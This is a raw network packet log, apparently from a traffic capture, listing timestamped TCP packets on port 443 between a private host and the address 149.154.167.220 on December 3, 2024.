Dec 3, 2024 14:28:24.983836889 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.983916044 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.983964920 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.983977079 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.984004974 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.984004974 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.984090090 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:24.984103918 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.028345108 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.028419018 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.028549910 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.028659105 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.028692961 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.028920889 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.029145956 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.029167891 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.029184103 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.029239893 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.029262066 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.029294968 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.029346943 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.029361963 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.075321913 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.149811983 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.150072098 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.150441885 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.150517941 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.150566101 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.195331097 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.210469007 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.215755939 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.216274023 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.216284037 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.216634989 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.216639996 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.216806889 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.216820002 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.216905117 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.216921091 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.216931105 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.216937065 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217020035 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217035055 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217044115 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217052937 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217128992 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217145920 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217194080 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217206955 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217264891 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217273951 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217298031 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217300892 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217430115 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217443943 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217467070 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217480898 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217494965 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217504025 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217523098 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217534065 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217555046 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217571020 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217588902 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217596054 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217609882 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217616081 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217647076 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217658043 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217756033 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217768908 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217776060 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217777967 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217823029 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217834949 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217883110 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217897892 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217957020 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217967987 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.217986107 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.217992067 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218009949 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218027115 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218035936 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218039989 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218067884 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218080997 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218091011 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218095064 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218112946 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218120098 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218194008 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218203068 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218209982 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218213081 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218231916 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218240023 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218291044 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218302965 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.218321085 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218342066 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218399048 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218422890 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218430996 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218455076 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218468904 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218487024 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218497038 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218564987 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218590021 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.218631983 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.263329029 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.263989925 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264074087 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264139891 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264202118 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264278889 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264307976 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264419079 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264466047 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264523029 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.264543056 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.266309023 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.266484022 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.266483068 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.267826080 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.267863989 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269145012 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.269260883 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.269336939 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269352913 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.269450903 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269474983 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269501925 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269650936 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269735098 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269778013 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269819021 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269859076 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269902945 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.269916058 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.310873985 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.310981035 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.311079025 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311101913 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.311136961 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311152935 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311167002 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311188936 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311252117 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311328888 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.311856985 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311877966 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311888933 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311939001 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311983109 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.311994076 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.312164068 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.312213898 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.312222004 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.312258959 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.312285900 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.312294006 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.312303066 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.312310934 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.355333090 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.355350971 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.355901957 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.355983973 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.355997086 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356008053 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356097937 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356235027 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356252909 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356261015 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356297970 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356308937 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356323004 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356375933 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.356420040 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.388319016 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.388475895 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.388549089 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.388619900 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.388659954 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.389494896 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.389643908 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.389672995 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.389691114 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.389861107 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.389905930 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.390738964 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.390888929 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.391149044 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.391293049 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.391302109 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.391344070 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.391421080 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.391630888 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.391650915 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.391798019 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.403345108 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.403939962 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.403990984 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.403997898 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404266119 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404283047 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404319048 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404336929 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404350042 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404350042 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404381037 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404438019 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.404464006 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.435333014 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.435615063 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.451324940 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.457663059 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.457818985 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.458074093 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.458113909 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.458131075 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.483331919 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.503339052 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.503834963 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.503983974 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.504009008 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.504101992 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.506247044 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.506388903 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.506421089 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.506541014 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.506572962 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507107973 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.507169008 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.507397890 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507641077 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507652998 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.507674932 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507718086 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507764101 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507800102 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507833004 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507839918 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507862091 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507895947 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507901907 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507966995 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.507982969 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.508892059 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.508907080 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.509040117 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.509059906 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.510104895 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.510263920 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.510308027 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.510330915 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.511337042 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.511497021 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.511535883 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.511559010 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.511580944 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.511686087 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.511703968 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.511719942 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.511720896 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.511812925 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.511840105 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.511851072 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.512582064 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.512658119 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.512953043 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.512988091 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.513816118 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.513829947 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.513952971 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.513991117 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.513992071 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.514004946 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.514118910 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.514142990 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.515069962 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.515194893 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.515505075 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.515793085 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.515824080 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.516480923 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.516618967 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.516649008 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.516660929 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.516668081 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.516681910 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.516693115 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.516752005 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.516789913 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.517591953 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.517719030 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.517740965 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.517752886 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.518642902 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.518668890 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.550983906 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.551120996 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.551141977 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.551237106 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.551336050 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.551362038 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.551379919 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.579217911 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.579344034 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.579627037 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.579667091 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.579684973 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.595329046 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.595494032 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.627374887 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.627522945 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.628981113 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.629117966 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.629326105 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.629415035 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.629473925 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.629511118 CET	49834	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.629549026 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.630012989 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.644365072 CET	443	49834	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.671340942 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.690906048 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.691087008 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.691127062 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.691181898 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.691200018 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.700943947 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.701105118 CET	443	49836	149.154.167.220	192.168.2.5
Dec 3, 2024 14:28:25.701153040 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.701250076 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.701476097 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.701544046 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.701616049 CET	49836	443	192.168.2.5	149.154.167.220
Dec 3, 2024 14:28:25.701641083 CET	49836	443	192.168.2.5	149.154.167.220
